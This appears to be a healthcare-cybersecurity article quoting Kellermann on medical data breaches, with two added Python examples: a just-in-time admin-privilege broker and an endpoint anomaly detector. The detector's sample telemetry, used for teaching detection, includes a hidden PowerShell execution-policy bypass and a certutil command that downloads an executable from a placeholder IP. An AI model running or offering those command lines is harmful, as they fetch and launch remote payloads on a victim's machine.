What Makes Healthcare Data Vulnerable to Attack?
Gary Cantrell, head of investigation at the Department of Health and Human Services Office of the Inspector General, told CBS that medical identity theft is something he sees often. Last year, the agency dealt with roughly 400 reported cases of medical data breaches. Some of that data ended up for sale on the darknet.
Despite knowing data has been compromised, investigators don’t always know how or when it will be used, Cantrell says.
Kellermann argues there’s a reason why these breaches occur in healthcare so often: The industry has some of the worst cybersecurity practices worldwide.
“Organizations are far too reliant on firewalls and encryption, neither of which can stop modern-day cyberattacks,” Kellermann says. “The big challenge with the entire governance of the healthcare sector with regard to cybersecurity is that there are physicians who run the board, who run various departments. And these folks are very astute when it comes to medical knowledge but not quite prepared to handle the risks of IT and IT deployment.
“When they're deploying IT left and right with mobility, Software as a Service and cloud, and yet only protecting it with encryption, they leave themselves wide open to attack.”
Just as patients who walk into a physician’s office or a hospital should expect a clean, safe environment, they should have the same expectations for the facility’s digital landscape.
Says Kellermann: “The irony here is that these digital transformation efforts are spreading virtual disease, which in the long-term not only inhibits operations, it causes this phenomenon I would call digital disease among customers — where their identities are stolen, and they are extorted because their personal information has been released.”
How to Minimize the Possibility of Stolen Medical Data
For patients, the consequences of having their protected health information stolen, sold and used to create fake claims in their name can be violating and have a major impact on their future care decisions. When healthcare organizations fail to protect patient data, they risk losing the trust of their patients and, ultimately, their reputation.
Continuous evaluation of security practices has become imperative for healthcare organizations hoping to avoid a breach. Introducing controls such as application control and privileged access management is a step in the right direction, because they cover cases that encryption alone does not: encryption protects data at rest and in transit, but it does nothing to stop an attacker who reads that data through a compromised application or a legitimately privileged account.
“Administrators shouldn't have administrative privileges at all times,” says Kellermann. “Even though they’re administrators, they should only have just-in-time administration for a specific purpose or use. Hackers are very smart, and they’ll target all administrators and superuser accounts when they go after an infrastructure because they know those people have the keys to the castle.”
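One way to model the just-in-time administration Kellermann describes, as an added example that is not code from the article or from any product: a small broker that issues administrative rights only as a time-bounded grant tied to one principal, one role and a stated purpose, denies by default when no grant is active, caps the lifetime of any grant, and logs every decision. The principal and role names, the change-ticket reference and the timestamps are constructed for illustration.

```python
"""Added example (not from the article): a just-in-time privilege broker."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Grant:
    principal: str
    role: str
    purpose: str       # ticket/change reference the operator cited (constructed)
    granted_at: int    # seconds since epoch
    expires_at: int    # exclusive: a check at exactly expires_at is denied
    revoked: bool = False


class JitBroker:
    """Admin rights exist only while a grant is active; nothing is standing."""

    MAX_TTL = 4 * 3600  # constructed policy ceiling: no grant longer than four hours

    def __init__(self) -> None:
        self.grants: Dict[Tuple[str, str], Grant] = {}  # (principal, role) -> grant
        self.audit: List[str] = []                      # every decision, append-only

    def request(self, principal: str, role: str, purpose: str,
                now: int, ttl: int) -> Grant:
        # Elevation must cite a purpose; an empty one is refused outright.
        if not purpose.strip():
            raise ValueError("a purpose is required for elevation")
        ttl = min(max(ttl, 0), self.MAX_TTL)  # clamp to the policy ceiling
        grant = Grant(principal, role, purpose, now, now + ttl)
        self.grants[(principal, role)] = grant
        self.audit.append(f"{now} GRANT {principal} {role} "
                          f"until {grant.expires_at} for {purpose!r}")
        return grant

    def is_authorized(self, principal: str, role: str, now: int) -> bool:
        # Deny by default: no grant, a revoked grant or an expired grant all fail.
        grant: Optional[Grant] = self.grants.get((principal, role))
        ok = (grant is not None and not grant.revoked
              and grant.granted_at <= now < grant.expires_at)
        self.audit.append(f"{now} {'ALLOW' if ok else 'DENY'} {principal} {role}")
        return ok

    def revoke(self, principal: str, role: str, now: int) -> bool:
        grant = self.grants.get((principal, role))
        if grant is None or grant.revoked:
            return False
        grant.revoked = True
        self.audit.append(f"{now} REVOKE {principal} {role}")
        return True

    def sweep(self, now: int) -> List[Grant]:
        """Mark grants that have run out as revoked and return them (for reporting)."""
        expired = [g for g in self.grants.values()
                   if not g.revoked and now >= g.expires_at]
        for g in expired:
            g.revoked = True
            self.audit.append(f"{now} EXPIRE {g.principal} {g.role}")
        return expired


def demo() -> List[bool]:
    """Three checks around one grant: before it exists, while active, after expiry."""
    broker = JitBroker()
    t0 = 1_700_000_000  # constructed timestamp
    before = broker.is_authorized("alice", "db-admin", t0)
    broker.request("alice", "db-admin", "CHG-4411 index rebuild", t0, ttl=1800)
    during = broker.is_authorized("alice", "db-admin", t0 + 600)
    after = broker.is_authorized("alice", "db-admin", t0 + 1800)
    return [before, during, after]


if __name__ == "__main__":
    print(demo())
```

The same shape maps onto real deployments where the grant is a directory group membership with an expiry and the audit list is a SIEM feed; the point the example makes is that the authorization check, not the account's title, decides whether the "keys to the castle" work at this moment.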
Much of an organization's most sensitive data, however, is created, viewed and transmitted on endpoints. That is also where breaches most often begin: endpoints are operated by users, typically seen as the “weak link” in a security strategy, and their number keeps growing as Internet of Things devices are added to networks.
An endpoint protection platform is critical if security teams are to take an active role in combating cyberattacks. Effective defense, Kellermann notes, should have three things:
“It should have behavioral anomaly detection,” he says. “It should be able to capture all the data or all of the phenomenon that’s occurring on an endpoint and allow you to store that so you can look back in time to understand the root cause of that criminal activity. And it should have the capacity to have an open API so you can connect to other security controls or mechanisms that you have that predate your modernization efforts, or postdate it for that matter.”
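The three capabilities above, as an added illustration that is not code from the article or from any endpoint product: a toy detector that retains every process event, learns which parent/child process pairs occur during a baseline window, flags a pair it has never seen (behavioral anomaly detection), walks the retained history back to the root of the process chain (looking back in time for the root cause), and serializes the result as plain JSON so another control can consume it (the open-API point). The hostname, PIDs, command lines and the 203.0.113.5 address are constructed sample telemetry.

```python
"""Added example (not from the article): baseline-based endpoint anomaly
detection with full event retention and process-chain lookback."""
import json
from dataclasses import dataclass, asdict
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class ProcEvent:
    ts: int          # event time in seconds (constructed)
    host: str
    pid: int
    ppid: int
    image: str       # executable name, lower-case
    cmdline: str


@dataclass
class Alert:
    pair: Tuple[str, str]   # (parent_image, child_image) never seen in the baseline
    chain: List[ProcEvent]  # ancestry from the root process down to the flagged one

    def to_json(self) -> str:
        # Plain JSON: any SIEM/SOAR with an HTTP or file API can take this as-is.
        return json.dumps({"pair": list(self.pair),
                           "chain": [asdict(e) for e in self.chain]})


class EndpointDetector:
    """Assumption: (host, pid) is unique within the retained window. A real
    sensor keys on a process GUID so that PID reuse cannot corrupt the chain."""

    def __init__(self) -> None:
        self.history: List[ProcEvent] = []               # every event, never dropped here
        self.by_pid: Dict[Tuple[str, int], ProcEvent] = {}  # (host, pid) -> creating event
        self.baseline: Set[Tuple[str, str]] = set()      # learned (parent, child) pairs

    def _record(self, e: ProcEvent) -> Tuple[str, str]:
        self.history.append(e)
        self.by_pid[(e.host, e.pid)] = e
        parent = self.by_pid.get((e.host, e.ppid))
        return (parent.image if parent else "<root>", e.image)

    def learn(self, events: List[ProcEvent]) -> None:
        """Baseline window: record events and remember every parent/child pair."""
        for e in events:
            self.baseline.add(self._record(e))

    def observe(self, e: ProcEvent) -> Optional[Alert]:
        """Live window: record the event, alert only on a pair not in the baseline."""
        pair = self._record(e)
        if pair in self.baseline:
            return None
        return Alert(pair=pair, chain=self.ancestry(e))

    def ancestry(self, e: ProcEvent) -> List[ProcEvent]:
        # Walk the retained history toward the root; the seen-set guards against loops.
        chain, seen = [e], set()
        while True:
            key = (chain[-1].host, chain[-1].ppid)
            if key in seen or key not in self.by_pid:
                break
            seen.add(key)
            chain.append(self.by_pid[key])
        return chain[::-1]

    def events_between(self, host: str, t0: int, t1: int) -> List[ProcEvent]:
        """Lookback query an analyst would run around an alert's timestamp."""
        return [e for e in self.history if e.host == host and t0 <= e.ts <= t1]


# Constructed baseline: a normal session on workstation ws01.
BASELINE = [
    ProcEvent(1000, "ws01", 100, 1,   "explorer.exe", "explorer.exe"),
    ProcEvent(1001, "ws01", 110, 100, "outlook.exe",  "outlook.exe"),
    ProcEvent(1002, "ws01", 120, 110, "winword.exe",  "winword.exe agenda.docx"),
    ProcEvent(1003, "ws01", 130, 100, "chrome.exe",   "chrome.exe"),
]
# Constructed live feed: a mailed document spawning a shell, then a downloader.
LIVE = [
    ProcEvent(2000, "ws01", 200, 1,   "explorer.exe",   "explorer.exe"),
    ProcEvent(2001, "ws01", 210, 200, "outlook.exe",    "outlook.exe"),
    ProcEvent(2002, "ws01", 220, 210, "winword.exe",    "winword.exe invoice.docx"),
    ProcEvent(2003, "ws01", 230, 220, "powershell.exe", "powershell.exe -w hidden -ep bypass"),
    ProcEvent(2004, "ws01", 240, 230, "certutil.exe",
              "certutil.exe -urlcache -split -f http://203.0.113.5/a.exe a.exe"),
]


def run_demo() -> List[Alert]:
    det = EndpointDetector()
    det.learn(BASELINE)
    return [a for a in (det.observe(e) for e in LIVE) if a is not None]


if __name__ == "__main__":
    for alert in run_demo():
        print(alert.to_json())
```

Note what the first alert carries: not just "winword.exe spawned powershell.exe" but the whole retained chain back to explorer.exe and outlook.exe, which is the root-cause question an investigator asks first. In production the baseline is learned per host role rather than globally, and the JSON goes to the SIEM through whatever API it already exposes rather than to stdout.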
Still, security practices only work if everyone is on board. It’s important for all healthcare staff to receive regular security awareness training to help stop cyberattacks before they happen. Healthcare employees are almost as likely to report an incident as internal security teams.
As for patients hoping to increase their own personal security, Kellermann offers the following advice: Keep your data close.
“When you enter a new facility or a new physician's office, you're not required by law to provide your Social Security number, so don't,” he says. “Start there, and basically minimize the information you're putting out.”